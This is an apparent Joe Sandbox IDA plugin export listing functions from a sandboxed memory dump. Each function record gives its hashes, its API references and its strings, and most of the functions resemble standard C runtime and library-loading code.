Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLast
String ID: cannot resolve symbol '%s': %s
API String ID: 1452528299-2703306267
Opcode ID: 382eec8f84f59ebd06732b4d299ee1a21e2cab44a48f18aa93b05172692188d4
Instruction ID: d9def77d9cb3eecc1612dfbda376423d275efa9ed54768baf4e8b60116dc202f
Opcode Fuzzy Hash: 382eec8f84f59ebd06732b4d299ee1a21e2cab44a48f18aa93b05172692188d4
Instruction Fuzzy Hash: 577119A6A087818ADB219B25CC546ACE760FB54BD0F948232DE1E577D5DE3CF891CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFFFB0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF720C00013
_set_statfp.LIBCMT ref: 00007FF720C00037

Strings

cosh, xrefs: 00007FF720C00076
", xrefs: 00007FF720C00094

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _set_statfp
String ID: "$cosh
API String ID: 1156100317-3800341493
Opcode ID: 3527226068fc837922194fe3f66ab0bd93b502f46f543947ad2714f2ced6d2c8
Instruction ID: 1ea9d2b1dcdcc438d65b028fdbf37d32b75498a1f6a6abb66b1d3f71918da27b
Opcode Fuzzy Hash: 3527226068fc837922194fe3f66ab0bd93b502f46f543947ad2714f2ced6d2c8
Instruction Fuzzy Hash: 15816261A28F8589D6639B38A8513F6B358FF5A3D5F519333D58E31B51DF2CB0C28A20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0D184 Relevance: 7.7, APIs: 5, Instructions: 202COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C0D1C6
GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF720C0D143,?,?,FFFFFFFE,00007FF720C0D536), ref: 00007FF720C0D284
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF720C0D143,?,?,FFFFFFFE,00007FF720C0D536), ref: 00007FF720C0D30E

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: db66fc161205daab70daedc293a48d686f5db1f4363fab8ee29e9db382aab8e0
Instruction ID: 48ee1517b9d009af90f24fe5299d122ff2fa24c49e96df824a9fbf0c44f4ddf9
Opcode Fuzzy Hash: db66fc161205daab70daedc293a48d686f5db1f4363fab8ee29e9db382aab8e0
Instruction Fuzzy Hash: B4818FA2E1861289E710AB699C806FCA672FF44B94FC44131DE0E637A5DE3DB485CB31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C10078 Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF720C100B4
_set_statfp.LIBCMT ref: 00007FF720C100D2
_set_statfp.LIBCMT ref: 00007FF720C100FB
_set_statfp.LIBCMT ref: 00007FF720C102B4

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 8e49d4906af4448fee86808fa03185cee9d90748d49e94bab1f9cfc244d0afb8
Instruction ID: ad1161e395946a2ae14700c445f355c563676d841193ecae907ed73a5cf8ab67
Opcode Fuzzy Hash: 8e49d4906af4448fee86808fa03185cee9d90748d49e94bab1f9cfc244d0afb8
Instruction Fuzzy Hash: 2051A092D0894696E662BA3C9C503FAE260FF44360FA49235E95E367D0DF7CB4C18E30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0FC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF720C0FC48
_set_statfp.LIBCMT ref: 00007FF720C0FC63
_set_statfp.LIBCMT ref: 00007FF720C0FC7F
_set_statfp.LIBCMT ref: 00007FF720C0FCBB

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
Instruction ID: 85423aa7c0cb9c858f870eed5df31594bf546862e410e9e83756a87b2ff10d6c
Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
Instruction Fuzzy Hash: 3D111FA2E18A0B46F664212CE8573F99142FF94374E944635EE6E06FD68E2C78C3C934

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0DB98 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C0DE41

Part of subcall function 00007FF720C1B4D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C1B4ED

Strings

ccs, xrefs: 00007FF720C0DD8D
UTF-8, xrefs: 00007FF720C0DDC4
UTF-16LEUNICODE, xrefs: 00007FF720C0DDE5

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4f9e3838f21cefc3d5966103b1e640b5c5c53066c6e52fbd7bfed03ace8eac49
Instruction ID: 1e4242e3445e1727f9cd4ad91c0eb24bcdefe0d3339ed156c030b61959ee60b2
Opcode Fuzzy Hash: 4f9e3838f21cefc3d5966103b1e640b5c5c53066c6e52fbd7bfed03ace8eac49
Instruction Fuzzy Hash: AC819DB1D0C34286F7656A2C8A542F9AB93FF12748FD59035CA0A46795CA2EB8C1DE31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BE611C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE615F
_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE63AD

Strings

*, xrefs: 00007FF720BE62D5
, xrefs: 00007FF720BE616B

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 750f9bbf5b9275a15d53bdc89c7c19f80ffebf2ce48f309f2496a6267291e29c
Instruction ID: c7c17804408eca425b4f653b3825913ee7f6acbae9f733f6b634cd05eec81b5c
Opcode Fuzzy Hash: 750f9bbf5b9275a15d53bdc89c7c19f80ffebf2ce48f309f2496a6267291e29c
Instruction Fuzzy Hash: A6815F7290828286EB78AF398C4417DB7B0EB01B94FD44135CA4A46396DF39F885CF39

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BE5330 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE5367
_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE53A1

Strings

, xrefs: 00007FF720BE5570
*, xrefs: 00007FF720BE5506

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: b7f3ad1c86d270a42b928145908bb2c1d0f59c70e6619d8ec3eb18c94a12e33f
Instruction ID: ea447cacd8669b116b5757dbeffc774043ddb9bde5bfe5b1e305d8ffd8d9dfb5
Opcode Fuzzy Hash: b7f3ad1c86d270a42b928145908bb2c1d0f59c70e6619d8ec3eb18c94a12e33f
Instruction Fuzzy Hash: 65811C7280C28686EB74AF258C4527DB7E2EB15B44FD80136DA4B46399CE7DF4818F35

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFFAE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF720BFFB38

Strings

sinh, xrefs: 00007FF720BFFB86
", xrefs: 00007FF720BFFBA5

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _set_statfp
String ID: "$sinh
API String ID: 1156100317-1232919748
Opcode ID: 17ece3eff11d6790b94e8039b0ad0c70cbfcb95e3acb92d2298369319c5b4b9e
Instruction ID: 7e93a9f39446512d27a0f222d4e823d8eadbadf4841ed574f1b76bcab4537096
Opcode Fuzzy Hash: 17ece3eff11d6790b94e8039b0ad0c70cbfcb95e3acb92d2298369319c5b4b9e
Instruction Fuzzy Hash: 43919261928F858DD6739B389C453A5B314EF5A394F518333E58F32B61DF2CB0838A20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFF624 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF720BFF6CF

Strings

!, xrefs: 00007FF720BFF704
acos, xrefs: 00007FF720BFF6E2

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _set_statfp
String ID: !$acos
API String ID: 1156100317-2870037509
Opcode ID: f44279ad54ed9413e535f5ad7b6d347ef0614247c92ddb48b13714c85f7291af
Instruction ID: 86469b4d09d341bbce8332f5004f10e9f5d803e85bbac93c892ac0153938505d
Opcode Fuzzy Hash: f44279ad54ed9413e535f5ad7b6d347ef0614247c92ddb48b13714c85f7291af
Instruction Fuzzy Hash: 03618761D18F468EE5239B385C542B6D624EF963D0F918332E95F75F64DF1CB0828A20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFF398 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF720BFF43B

Strings

asin, xrefs: 00007FF720BFF44E
!, xrefs: 00007FF720BFF470

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _set_statfp
String ID: !$asin
API String ID: 1156100317-2188059690
Opcode ID: 3d9322a4b1b119b62eaaf1bc541914b4da9db28d46a8c0720257969e86701752
Instruction ID: c95b86e97b46ee9dd7ef2273a8e8dcdd6a9ea5b802c31c7095d112be39abf64a
Opcode Fuzzy Hash: 3d9322a4b1b119b62eaaf1bc541914b4da9db28d46a8c0720257969e86701752
Instruction Fuzzy Hash: E9519C61D28F468EE6139B385C552B6D324EF96380F918336E95E35F64DF1DB0C28A30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BCB6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32 ref: 00007FF720BCB6BE
GetProcAddress.KERNEL32 ref: 00007FF720BCB6DA
GetProcAddress.KERNEL32 ref: 00007FF720BCB717
SetLastError.KERNEL32 ref: 00007FF720BCB724

Strings

kernel32.dll, xrefs: 00007FF720BCB6A0

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AddressProc$ErrorLastLibraryLoad
String ID: kernel32.dll
API String ID: 856020675-1793498882
Opcode ID: 05a99b42ff93bcaa22d00b3a9d340ded0e84e891b7f32cb1ea37d2acedc0f622
Instruction ID: 26c3fc61e5e08668df0f4cafd92441058eec4fd20c1d9089299fea9e8247ccd9
Opcode Fuzzy Hash: 05a99b42ff93bcaa22d00b3a9d340ded0e84e891b7f32cb1ea37d2acedc0f622
Instruction Fuzzy Hash: 14218466609B8186EA619B29EC9066DF7A0FF84BD0F549431CE4E07754EF3CE4928B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BCB6A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32 ref: 00007FF720BCB6BE
GetProcAddress.KERNEL32 ref: 00007FF720BCB6DA
GetProcAddress.KERNEL32 ref: 00007FF720BCB717
SetLastError.KERNEL32 ref: 00007FF720BCB724

Strings

user32.dll, xrefs: 00007FF720BCB6A9

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AddressProc$ErrorLastLibraryLoad
String ID: user32.dll
API String ID: 856020675-38312619
Opcode ID: d0a447769f4203c1c1ff5813a9cc4a8c19414c44417825eb213b033d19d625ae
Instruction ID: ec6c4ea3cb251011e6324384bdbcfc4cbb1dd5e3c72f60a17d116e2eb005393e
Opcode Fuzzy Hash: d0a447769f4203c1c1ff5813a9cc4a8c19414c44417825eb213b033d19d625ae
Instruction Fuzzy Hash: 73218466609B8186EA619B29EC9066DF7A0FF94B90F549431CE4E07754EF3CE4928B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BCB6B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32 ref: 00007FF720BCB6BE
GetProcAddress.KERNEL32 ref: 00007FF720BCB6DA
GetProcAddress.KERNEL32 ref: 00007FF720BCB717
SetLastError.KERNEL32 ref: 00007FF720BCB724

Strings

gdi32.dll, xrefs: 00007FF720BCB6B2

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AddressProc$ErrorLastLibraryLoad
String ID: gdi32.dll
API String ID: 856020675-1341420408
Opcode ID: 54be177f07439a90ac0b1cc8f290a3c846ebbfb6d3545252ada49246a09b7657
Instruction ID: f6666f94e7687d4338e9ac6e1c5c9bab71a5309bfeab40dd725302c091e9ccde
Opcode Fuzzy Hash: 54be177f07439a90ac0b1cc8f290a3c846ebbfb6d3545252ada49246a09b7657
Instruction Fuzzy Hash: 7E11C372605B8186EA119B29EC9026DF7A0FF84BD0F548431CE8E07754EF3CE492CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C11D90 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C11DD1
_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C11E51
_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C11EA5
_get_daylight.LIBCMT ref: 00007FF720C11EFD

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: d7edea3600ceb722a4312ef71fba7a806c38da98ddc4022e7886f718fefbdbbf
Instruction ID: 6d8e7096c8a32e169c8e9f49c13255f8fea8ef74c944eca52177c8599ef23f8e
Opcode Fuzzy Hash: d7edea3600ceb722a4312ef71fba7a806c38da98ddc4022e7886f718fefbdbbf
Instruction Fuzzy Hash: 0C518DB2E0861286F7696AAC9C083FAE591EF40714F995135DE09463D6CA2CF8C18EB1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C10C60 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,00007FF720BA0126), ref: 00007FF720C10C90
GetExitCodeProcess.KERNEL32 ref: 00007FF720C10CA2
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF720BA0126), ref: 00007FF720C10CBC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00007FF720BA0126), ref: 00007FF720C10CF0

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
String ID:
API String ID: 2321548817-0
Opcode ID: 0ac2ff3ce93231d73f59403a5169545862334051fe72a869e1b48455d95cec51
Instruction ID: 725ee67712ecf0b03c1ae530aadf1d51f67237ed0e0564043ce225a3022cd8b4
Opcode Fuzzy Hash: 0ac2ff3ce93231d73f59403a5169545862334051fe72a869e1b48455d95cec51
Instruction Fuzzy Hash: 881181B1A0864186FA54BF299C502BDE6A0EF44BA0FA45330E929577D4DF7CF4818F71

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BA1FD0 Relevance: 6.0, APIs: 4, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF720BA1FF1
GetProcAddress.KERNEL32 ref: 00007FF720BA2002
GetModuleHandleExA.KERNEL32 ref: 00007FF720BA201F
GetProcAddress.KERNEL32 ref: 00007FF720BA2031

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-0
Opcode ID: 2632887060231f01f8d6da7983ebf0db9170a1dd1ba29d9f7b50d1763c5ff522
Instruction ID: 70c290e7a4d261b406d96d42a7ebd4fc0a8d1c900a91dca0acccadc5748fd649
Opcode Fuzzy Hash: 2632887060231f01f8d6da7983ebf0db9170a1dd1ba29d9f7b50d1763c5ff522
Instruction Fuzzy Hash: 7EF0D661A09A8286EE959B1ABC806B9E360FF48BC0B841034DD0F06718EF2CF0D08B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BE510C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE5316

Part of subcall function 00007FF720BEB50C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720BEB596

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE5151

Strings

, xrefs: 00007FF720BE52A1

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-3916222277
Opcode ID: 0a8a8d45eaf96d2a73655245a80df36af030cc4d3d42afe52c3477950326923b
Instruction ID: f429b03be4b16b342dce67635e3675116963b5af6ff8604fe47ee97fc7d1a18e
Opcode Fuzzy Hash: 0a8a8d45eaf96d2a73655245a80df36af030cc4d3d42afe52c3477950326923b
Instruction Fuzzy Hash: AE616E7291828286EB78AF288C5537CB7A5EB05B49FD51135CB0B06399CF68F485CF35

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BE57E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE5823
_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE59F2

Strings

, xrefs: 00007FF720BE596F

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-3916222277
Opcode ID: 2d095834a2104921987fa37a4aff31fa213f193f1dcbe801d9f563858545fc12
Instruction ID: b0ffbb3cb35291034cef176e981b2f865db02ae6e171c13b3443b29a72e0bb64
Opcode Fuzzy Hash: 2d095834a2104921987fa37a4aff31fa213f193f1dcbe801d9f563858545fc12
